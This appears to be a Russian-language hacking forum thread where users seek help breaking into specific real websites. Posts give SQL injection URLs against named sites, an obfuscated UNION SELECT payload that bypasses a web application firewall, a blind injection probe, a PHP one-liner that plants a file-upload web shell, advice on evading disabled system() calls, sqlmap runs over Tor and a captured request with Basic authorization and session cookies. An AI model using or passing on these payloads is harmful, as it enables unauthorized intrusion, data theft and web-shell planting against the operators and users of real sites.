Вот такая беда, мини шел работает, могу вывести phpinfo, но есть делаю запрос cmd=system('ls -la'); то выдает ощибку Warning: system() has been disabled for security reasons я так понял она выключена в php.ini как можно обойти?
Если у сайта есть возможность держать и работать с таким объёмом данных, скорей всего пропускная способность чуть выше.
Это проверено. DIOS делается рекурсивными зхапросами если бы ты посмотрел на запрос. И данные в миллион ты не выведешь, в лучшем случае упадешь по таймауту. А то сколько он может хранить это не зависит от мощности.
В чем проблема сделать 100 запросов по 10к строк вывода? И ничего не упадет, на личном опыте сливал и куда больше строк через DIOS, но конечно не 1кк строк за раз (что за бред), а разбив на меньший объем, но у человека совсем другая ситуация!
А тут помогают раскрутить? Нашел уязвимость, но как я только не пытался крутить.. бесполезно параметр listcount Или это обычная ошибка синтаксиса, а я голову ломаю?
Помогите вывод сделать, на фильтр не похоже.. Code: https://www.p2p.tu-darmstadt.de/publications/details/?no_cache=1&tx_bibtex_pi1%5Bpub_id%5D=TUD-CS-2014-0992'+order+by+57+--+
Стоит ограничение на количество символов в переменной, так что крутить получится только как слепую Code: https://www.p2p.tu-darmstadt.de/publications/details/?no_cache=1&tx_bibtex_pi1%5Bpub_id%5D=TUD-CS-2014-0992'or mid(database(),1,1)='t';%00
Пробуй файл записать Code: cmd=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go_up></form>
Извините если не в том разделе, возникла проблема с Microsoft SQL Server/Sybase stacked queries (comment) Дело в том, что я с помощью sqlmap вытаскиваю список баз, таблицы, текущий пользователь, но никак не получается вытащить колонки и инфу из таблиц. На каждую таблицу sqlmap предлагает брутить колонки, а на инфу говорит что таблица содержит 0 строк (Колонки указывал вручную. т.к. знаю что в некоторых таблицах есть такая) Направьте на путь истинный, подскажите методы решения. Запрос sqlmap -r "file.txt" --random-agent --tor --time-sec=50 --dbms=MsSQL
http://www.arboe.at/index.php?id=9528&origin=search&no_cache=1&catId=176+select+union+111+--+ Злой waf так пускает, а как надо - хер! как обойти?
Code: http://www.arboe.at/index.php?id=9528&origin=search&no_cache=1&catId=-176+UniOn%0B/*hjh%0B%0Bijhi%0Bokihuygtfryujiko%0Biuytreftgyhujik%0Bijuhygtfrderftgyhujik%0Bokijuhygtfrftgyhuji%0Biuytrftgyh%0B*/Select+%20version/*asd*/()+--+ @BabaDook обошел Waf, но как я понял были проблемы с выводом версии и тд, не знаю почему не отписал сюда. Версию вывели, дальше сам! Ergebnisse der Volltextsuche zu "5.5.27"
from фильтрует, пытался скрыть кодировкой,пробелами,коментами, регистром, ни чё не помогает( может у кого то получится...
Ребят кто сможет подсказать с этими двумя урлами Ошибка есть Но что только не пробовал глухо(( Code: http://www[.]teraxpress[.]com/index.php?route=extension/module/merchant_profile&merchant_id=65 http://www[.]teraxpress[.]com/index.php?route=extension/module/merchantlogo/getStoreCategory&vpath=3&sort=pd.name&order=ASC&merchant_id=3&limit=25
всем доброго времени. на админке стоит http basic authentication читал что можно перехватить login : password в формате base64 Spoiler Code: GET /administrator/ HTTP/1.1 Connection: keep-alive Cache-Control: max-age=0 Authorization: Basic NDUzdDo1NHQ= Upgrade-Insecure-Requests: 1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: ru,en-US;q=0.8,en;q=0.6 X-Compress: null Cookie: ring=840b4f0c8e5d64ca6d2fe74dead87a4c; _ym_uid=1504109674995456289; city=25; region=104; visitor=e88e905cdaad3d67f0c6df4765c34a76c1e7d4eec4a3cc8e44345b11c108c473; _ga=GA1.3.2065729496.1504109674; PHPSESSID=4o4ui8jeikerke04dmltqtdcp0; pastafarian=c4e5bfebfbbf5abeb2936bb31ec6140386388055110b8debd270cbf7c755644d; winter=11457.59a6e778e6cd71.61786604; _ym_isad=1; _ga=GA1.2.2065729496.1504109674; _gid=GA1.2.994183403.1504355776 Authorization: Basic NDUzdDo1NHQ= < вроде как это и есть логин:пароль или это то что я отправляю, хотя GET возвращяет как можно обойти? только брут?